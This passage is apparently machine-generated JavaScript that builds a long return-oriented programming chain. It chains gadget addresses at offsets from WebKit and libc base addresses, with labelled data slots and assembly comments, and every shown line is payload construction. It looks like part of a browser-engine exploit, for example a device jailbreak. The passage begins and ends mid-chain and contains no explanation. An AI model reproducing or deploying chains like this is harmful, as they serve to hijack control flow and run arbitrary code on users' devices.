set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+396896, //L8298 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+396912, //L8299 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+396880, //L8297 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8297: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8298: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8299: db([0, 0]); // 0x0 set_gadgets([ 
webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+397024, //L8301 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+397072, //L8304 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+397040, //L8302 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8301: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8302: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8303: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8304: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+397184, //L8305+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+397176, //L8305 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L8305: db([0, 0]); // 0x0 set_gadgets([ ropchain+397200, //L8305+24 ropchain+397216, //L8300 libc_base+782311, //pop rsp ropchain+408824, //L8306 //L8300: libc_base+764760, //pop rsi ropchain+397256, //L8307 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8307: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8309: db([4294967196, 4294967295]); // -0x64 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+397376, //L8312 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+397360, //L8310 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8310: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8312: db([0, 0]); // 0x0 
set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+397552, //L8315 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+397568, //L8316 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+397520, //L8313 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+397536, //L8314 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8313: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8314: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8315: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8316: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+397648, //L8317 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+397664, //L8318 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8317: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8318: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+397760, //L8320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+397744, //L8319 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8319: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8320: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+397840, //L8321 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); 
//L8321: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8322: db([117, 0]); // 0x75 set_gadget(libc_base+144605,); //pop rdi //L8323: db([117, 0]); // 0x75 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+397984, //L8324 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+398016, //L8326 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+398000, //L8325 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8324: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8325: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8326: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+398184, //L8328 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+398200, //L8329 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+398168, //L8327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8327: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8328: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8329: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+398312, //L8331 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+398360, //L8334 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi 
ropchain+398328, //L8332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8331: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8332: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8333: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8334: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+398472, //L8335+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+398464, //L8335 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L8335: db([0, 0]); // 0x0 set_gadgets([ ropchain+398488, //L8335+24 ropchain+398504, //L8330 libc_base+782311, //pop rsp ropchain+408824, //L8336 //L8330: libc_base+764760, //pop rsi ropchain+398544, //L8337 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8337: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8339: db([4294967196, 4294967295]); // -0x64 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+398664, //L8342 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+398648, //L8340 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8340: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8342: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+398840, //L8345 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+398856, //L8346 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi 
ropchain+398808, //L8343 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+398824, //L8344 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8343: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8344: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8345: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8346: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+398936, //L8347 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+398952, //L8348 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8347: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8348: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+399048, //L8350 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+399032, //L8349 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8349: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8350: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+399128, //L8351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8351: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8352: db([120, 0]); // 0x78 set_gadget(libc_base+144605,); //pop rdi //L8353: db([120, 0]); // 0x78 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+399272, //L8354 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, 
//mov rax, [rsi] libc_base+764760, //pop rsi ropchain+399304, //L8356 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+399288, //L8355 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8354: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8355: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8356: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+399472, //L8358 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+399488, //L8359 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+399456, //L8357 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8357: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8358: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8359: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+399600, //L8361 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+399648, //L8364 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+399616, //L8362 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8361: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8362: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8363: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8364: db([0, 0]); // 0x0 
set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+399760, //L8365+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+399752, //L8365 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L8365: db([0, 0]); // 0x0 set_gadgets([ ropchain+399776, //L8365+24 ropchain+399792, //L8360 libc_base+782311, //pop rsp ropchain+408824, //L8366 //L8360: libc_base+764760, //pop rsi ropchain+399832, //L8367 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8367: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8369: db([4294967196, 4294967295]); // -0x64 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+399952, //L8372 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+399936, //L8370 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8370: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8372: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+400128, //L8375 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+400144, //L8376 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+400096, //L8373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+400112, //L8374 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8373: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8374: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L8375: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8376: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+400224, //L8377 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+400240, //L8378 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8377: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8378: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+400336, //L8380 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+400320, //L8379 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8379: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8380: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+400416, //L8381 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8381: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8382: db([88, 0]); // 0x58 set_gadget(libc_base+144605,); //pop rdi //L8383: db([88, 0]); // 0x58 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+400560, //L8384 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+400592, //L8386 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+400576, //L8385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8384: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L8385: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8386: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+400760, //L8388 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+400776, //L8389 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+400744, //L8387 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8387: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8388: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8389: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+400888, //L8391 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+400936, //L8394 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+400904, //L8392 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8391: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8392: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8393: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8394: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+401048, //L8395+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+401040, //L8395 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L8395: db([0, 0]); // 0x0 set_gadgets([ ropchain+401064, //L8395+24 ropchain+401080, //L8390 libc_base+782311, //pop rsp ropchain+408824, //L8396 //L8390: libc_base+764760, //pop rsi ropchain+401120, //L8397 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8397: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8399: db([4294967196, 4294967295]); // -0x64 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+401240, //L8402 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+401224, //L8400 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8400: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8402: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+401416, //L8405 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+401432, //L8406 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+401384, //L8403 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+401400, //L8404 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8403: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8404: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8405: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8406: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+401512, //L8407 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, 
[rsi] libc_base+764760, //pop rsi ropchain+401528, //L8408 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8407: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8408: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+401624, //L8410 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+401608, //L8409 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8409: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8410: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+401704, //L8411 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8411: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8412: db([111, 0]); // 0x6f set_gadget(libc_base+144605,); //pop rdi //L8413: db([111, 0]); // 0x6f set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+401848, //L8414 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+401880, //L8416 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+401864, //L8415 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8414: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8415: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8416: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx 
; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+402048, //L8418 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+402064, //L8419 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+402032, //L8417 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8417: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8418: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8419: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+402176, //L8421 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+402224, //L8424 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+402192, //L8422 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8421: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8422: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8423: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8424: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+402336, //L8425+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+402328, //L8425 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L8425: db([0, 0]); // 0x0 set_gadgets([ ropchain+402352, //L8425+24 ropchain+402368, //L8420 libc_base+782311, //pop rsp ropchain+408824, //L8426 //L8420: libc_base+764760, //pop rsi ropchain+402408, //L8427 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8427: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8429: db([4294967196, 4294967295]); // -0x64 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+402528, //L8432 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+402512, //L8430 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8430: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8432: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+402704, //L8435 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+402720, //L8436 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+402672, //L8433 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+402688, //L8434 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8433: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8434: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8435: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8436: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+402800, //L8437 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+402816, //L8438 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8437: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8438: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+402912, //L8440 
